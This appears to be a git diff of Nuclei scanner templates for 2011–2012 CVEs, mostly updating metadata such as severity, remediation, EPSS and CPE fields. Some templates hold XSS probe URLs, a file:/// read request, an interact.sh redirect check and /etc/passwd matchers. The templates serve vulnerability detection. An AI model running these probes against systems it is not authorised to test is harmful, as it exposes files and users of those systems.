1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter. + remediation: | + Validate and sanitize user input for the 'ReturnUrl' parameter to prevent open redirect vulnerabilities. reference: - https://www.exploit-db.com/exploits/36493 - https://nvd.nist.gov/vuln/detail/CVE-2011-5252 - https://www.invicti.com/web-applications-advisories/open-redirection-vulnerability-in-orchard/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/72110 + - http://orchard.codeplex.com/discussions/283667 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2011-5252 cwe-id: CWE-20 + epss-score: 0.02747 + epss-percentile: 0.89406 cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: orchardproject + product: orchard tags: cve,cve2011,redirect,orchard http: @@ -31,3 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# digest: 4a0a00473045022100b0ec41efab2f2cd00985db6e6a7774672150c4f2829350fdb1566351101281df022036415a60afbc0832cf55bc13a4ba5ce2ce3a55604aa4b90485a5a542cac8c729:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 1a58f04bdc..49d9c51987 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -5,17 +5,23 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. + remediation: | + Update to the latest version of the Featurific For WordPress plugin (1.6.2) or apply the vendor-supplied patch to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5265 - - http://web.archive.org/web/20210123103000/https://www.securityfocus.com/bid/50779/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71468 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2011-5265 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00432 + epss-percentile: 0.717 + cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: featurific_for_wordpress_project + product: featurific-for-wordpress google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" tags: cve,cve2011,wordpress,xss,wp-plugin @@ -27,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4a0a00473045022100d66fef0509892090c34a4fcb1cb45d9b21fdb90f3715b5c870608d78f4d583b702206b5a5f2242bf2fb41781fd1aa8da3092b82a928ae71d87d2d47c8f4b00d131c7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 81d205fc96..838fbcfc5c 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -3,22 +3,28 @@ id: CVE-2012-0392 info: name: Apache Struts2 S2-008 RCE author: pikpikcu - severity: critical + severity: medium description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. + remediation: Developers should immediately upgrade to at least Struts 2.3.18. reference: - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545 - http://www.exploit-db.com/exploits/18329 - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html - http://web.archive.org/web/20150110183326/http://secunia.com:80/advisories/47393 - remediation: Developers should immediately upgrade to at least Struts 2.3.18. + - http://struts.apache.org/2.x/docs/s2-008.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2012-0392 cwe-id: NVD-CWE-noinfo - tags: cve2012,apache,rce,struts,java,edb,cve + epss-score: 0.97059 + epss-percentile: 0.99679 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve2012,apache,rce,struts,java,edb,cve http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4a0a0047304502207c47dfcb8c4d5c01729903a06046a94a4cf35cf1a401618a18ad048c176d7f14022100b6b298b271d2f2681034acf54469b1931fea8905789f1404344a2fe828048570:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 35e0d96980..7122e164c1 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -3,9 +3,11 @@ id: CVE-2012-0394 info: name: Apache Struts <2.3.1.1 - Remote Code Execution author: tess - severity: critical + severity: medium description: | Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself." + remediation: | + Upgrade Apache Struts to a version higher than 2.3.1.1 or apply the necessary patches. reference: - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/ - https://www.exploit-db.com/exploits/31434 @@ -13,16 +15,20 @@ info: - http://www.exploit-db.com/exploits/18329 - https://nvd.nist.gov/vuln/detail/CVE-2012-0394 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2012-0394 - cwe-id: CWE-77 + cwe-id: CWE-94 + epss-score: 0.95611 + epss-percentile: 0.992 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: html:"Struts Problem Report" verified: true + max-request: 1 + vendor: apache + product: struts + shodan-query: html:"Struts Problem Report" tags: ognl,injection,edb,cve,cve2012,apache,struts - variables: first: "{{rand_int(1000, 9999)}}" second: "{{rand_int(1000, 9999)}}" @@ -43,4 +49,4 @@ http: status: - 200 -# Enhanced by md on 2023/01/30 +# digest: 490a0046304402201cdbf27950d60db643127174278d485a291b935413d0ce5c02016f069d377e3c022070248093bf9d6e340c1ce395681dfb37eeb2413514c5ab173b9303367ff9cc6f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 77fea1453e..d6f0f05021 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -3,20 +3,28 @@ id: CVE-2012-0896 info: name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access author: daffainfo - severity: high + severity: medium description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter. + remediation: | + Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability. reference: - https://packetstormsecurity.com/files/108631/ - - http://web.archive.org/web/20140804110141/http://secunia.com/advisories/47529/ - http://plugins.trac.wordpress.org/changeset/488883/count-per-day - https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896 + - http://wordpress.org/extend/plugins/count-per-day/changelog/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72385 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-0896 cwe-id: CWE-22 + epss-score: 0.02262 + epss-percentile: 0.8838 + cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: count_per_day_project + product: count_per_day google-query: inurl:"/wp-content/plugins/count-per-day" tags: packetstorm,cve,cve2012,lfi,wordpress,wp-plugin,traversal @@ -27,7 +35,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4a0a00473045022100e2cfe3876954ae7069da13117ccfeed106412e3c9147aa343e287dbe2c5df73602200def57d3742552436b7dd920e02ea6e97f1d2846877219ca05fa9fdac1a8f6b0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 11d2fd00ce..3d690cce20 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -5,17 +5,24 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-0901 - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2012-0901 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00216 + epss-percentile: 0.59369 + cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: attenzione + product: yousaytoo google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" tags: wp-plugin,packetstorm,cve,cve2012,wordpress,xss @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4a0a00473045022100df936ad44a1b7cb7af93dff236e615c622064e43517d293418673af09648af940220095e73526d3f0622b418107b77adac30ea9625441a996b16c03fa22364ff1e32:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index b68efb4c71..1f6645e748 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -3,21 +3,28 @@ id: CVE-2012-0981 info: name: phpShowtime 2.0 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. + remediation: | + Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/18435 - https://nvd.nist.gov/vuln/detail/CVE-2012-0981 - - http://web.archive.org/web/20151016200610/http://secunia.com/advisories/47802/ - http://www.exploit-db.com/exploits/18435 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72824 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-0981 cwe-id: CWE-22 - tags: phpshowtime,edb,cve,cve2012,lfi + epss-score: 0.04065 + epss-percentile: 0.91117 + cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kybernetika + product: phpshowtime + tags: phpshowtime,edb,cve,cve2012,lfi http: - method: GET @@ -26,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 490a00463044022069511f7b6beaf9a678f75e23bd54886ac8b0f3d81493828053508c6299ee4add02200d68bbe5e865bea54dd4b6791ac9b69252affb4326ff04a6c051b5c7e3f53a06:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 89c151d429..1e3f097f41 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -3,21 +3,28 @@ id: CVE-2012-0991 info: name: OpenEMR 4.1 - Local File Inclusion author: daffainfo - severity: high + severity: low description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. + remediation: | + Apply the latest security patches or upgrade to a newer version of OpenEMR. reference: - https://www.exploit-db.com/exploits/36650 - https://nvd.nist.gov/vuln/detail/CVE-2012-0991 - - http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/ - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72914 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:P/I:N/A:N + cvss-score: 3.5 cve-id: CVE-2012-0991 - tags: lfi,openemr,traversal,edb,cve,cve2012 + cwe-id: CWE-22 + epss-score: 0.8848 + epss-percentile: 0.98349 + cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: openemr + product: openemr + tags: lfi,openemr,traversal,edb,cve,cve2012 http: - method: GET @@ -26,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4b0a00483046022100b35674b8885ece0d4d2883b775685b3f2e4b4f5d49b85432004d198f314f944e022100f68d2a45f28feac52a2f67ac4181fae7eb2e4496d7ba8413304382c30c11ffbb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index e34c29b208..8eb72c6da3 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -3,21 +3,26 @@ id: CVE-2012-0996 info: name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: medium description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36784 - https://nvd.nist.gov/vuln/detail/CVE-2012-0996 - https://www.htbridge.ch/advisory/HTB23071 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2012-0996 cwe-id: CWE-22 - cvss-score: 5.0 - tags: cve,cve2012,lfi,edb + epss-score: 0.01048 + epss-percentile: 0.8238 + cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 + vendor: 11in1 + product: 11in1 + tags: cve,cve2012,lfi,edb http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 +# digest: 4a0a004730450221008cc19333241db73c372ade3e4d420d50e49efd3e4a3015b9465f172277fae64d02200ddb40ec07977274add7e787903128a922122ad612c51ef41d9e42da5ed80e68:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 3ea48b96a7..77bdf6c5ae 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -5,20 +5,26 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36873 - https://nvd.nist.gov/vuln/detail/CVE-2012-1226 - - http://web.archive.org/web/20210508221434/https://www.securityfocus.com/archive/1/521583 - http://www.vulnerability-lab.com/get_content.php?id=428 - remediation: Upgrade to a supported version. + - http://www.exploit-db.com/exploits/18480 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/73136 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2012-1226 cwe-id: CWE-22 - tags: cve,cve2012,lfi,dolibarr,traversal,edb + epss-score: 0.10469 + epss-percentile: 0.9437 + cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 + vendor: dolibarr + product: dolibarr_erp\/crm + tags: cve,cve2012,lfi,dolibarr,traversal,edb http: - method: GET @@ -27,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/18 +# digest: 490a004630440220396dde121c33a587159b367b16b2ff42fa7c49ab196d95302217822071b3add002200562afb284a634652c173d677d791b532270e67d22bbf3ad172b83484fd11b92:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index ae15fd0446..2024a27cae 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -3,22 +3,30 @@ id: CVE-2012-1823 info: name: PHP CGI v5.3.12/5.4.2 Remote Code Execution author: pikpikcu - severity: critical + severity: high description: | sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. + remediation: | + Upgrade to a patched version of PHP or apply the necessary security patches. reference: - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 - https://nvd.nist.gov/vuln/detail/CVE-2012-1823 - https://bugs.php.net/bug.php?id=61910 - http://www.php.net/ChangeLog-5.php#5.4.2 + - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03360041 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2012-1823 - tags: cve2012,kev,vulhub,rce,php,cve + cwe-id: CWE-20 + epss-score: 0.97491 + epss-percentile: 0.99969 + cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: php + product: php + tags: cve2012,kev,vulhub,rce,php,cve http: - raw: @@ -39,3 +47,5 @@ http: - type: status status: - 200 + +# digest: 4b0a00483046022100ff1a50391179ff6a24b907ffd1a47559d364266a4cff180e1aee3a9f4d9f7405022100af3e558677549a532a06c9e798bdf0d96876c64bf445d4e61d9298b32edd3f23:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index a6fd061bdd..60d4013690 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. + remediation: | + Update to the latest version of the All-in-One Event Calendar plugin to mitigate the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-1835 - https://web.archive.org/web/20151001133311/http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html @@ -12,11 +14,16 @@ info: - https://www.htbridge.com/advisory/HTB23082 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2012-1835 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00229 + epss-percentile: 0.60902 + cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: timely + product: all-in-one_event_calendar google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" tags: cve,cve2012,wordpress,xss,wp-plugin @@ -24,17 +31,17 @@ http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -45,4 +52,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4b0a00483046022100dcab407ff801dcc8d1c6988795f83c4740d7e336518446d7099f726f2d80c4d20221008e8d3630d8a53a8f5eeb8559c8b5ecc9af8c546e7fdee62602447fee66360409:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index ff056cc118..c5ea435e10 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -5,19 +5,27 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. + remediation: | + Update to the latest version of the WP-FaceThumb plugin (0.2 or higher) which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-2371 - - http://web.archive.org/web/20140805090129/http://secunia.com/advisories/49143/ - http://www.openwall.com/lists/oss-security/2012/05/15/12 - http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html + - http://wordpress.org/support/topic/plugin-wp-facethumb-reflected-xss-vulnerability-cwe-79 + - http://www.openwall.com/lists/oss-security/2012/05/16/1 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-2371 cwe-id: CWE-79 - tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin + epss-score: 0.00605 + epss-percentile: 0.76181 + cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mnt-tech + product: wp-facethumb + tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4a0a00473045022100b2f0eb48534986064ae21ff13c28ef644484cdd6a9cb6ab45b6c291abe747069022075880aa4611c0bd4abebfc48ce9a8e0201de578ba6f8d24439142fe4840da49d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index e50e3dd272..9963758035 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -3,24 +3,32 @@ id: CVE-2012-3153 info: name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153) author: Sid Ahmed MALAOUI @ Realistic Security - severity: critical + severity: medium description: | An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. + remediation: | + Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 - https://www.exploit-db.com/exploits/31737 - https://www.oracle.com/security-alerts/cpuoct2012.html - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html + - http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N cvss-score: 6.4 cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo - tags: cve,cve2012,oracle,rce,edb + epss-score: 0.97048 + epss-percentile: 0.99671 + cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: oracle + product: fusion_middleware + tags: cve,cve2012,oracle,rce,edb http: - method: GET @@ -29,30 +37,32 @@ http: - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///" req-condition: true + matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_1, "Reports Servlet")' - - type: status - status: - - 200 - - type: dsl dsl: - '!contains(body_2, "" - part: body - type: word part: header @@ -39,4 +45,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4a0a004730450220159667818abd9cbde9110c72e55448920a98cc72fc72667f576b4abef590167a02210091cad44ff153518cb1cb80cc9b83412170750586738b4b4d59504ac3e5328f7f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 1be5261856..a4f6b99d48 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -3,21 +3,29 @@ id: CVE-2012-4253 info: name: MySQLDumper 1.24.4 - Directory Traversal author: daffainfo - severity: high + severity: medium description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. + remediation: | + Upgrade to a patched version of MySQLDumper or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/37129 - https://nvd.nist.gov/vuln/detail/CVE-2012-4253 - http://packetstormsecurity.org/files/112304/MySQLDumper-1.24.4-LFI-XSS-CSRF-Code-Execution-Traversal.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/75286 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/75283 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2012-4253 cwe-id: CWE-22 - tags: packetstorm,cve,cve2012,lfi,edb + epss-score: 0.02906 + epss-percentile: 0.89661 + cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mysqldumper + product: mysqldumper + tags: packetstorm,cve,cve2012,lfi,edb http: - method: GET @@ -26,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4a0a00473045022100d36a4188433912b5f8d182aa03de240bf8a0dca4887832964a9a6c4544ce4cfd02201c17b0ad5299514c70c44bc98f21955bb16231ed834a7f038e692f06e4515a88:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4273.yaml 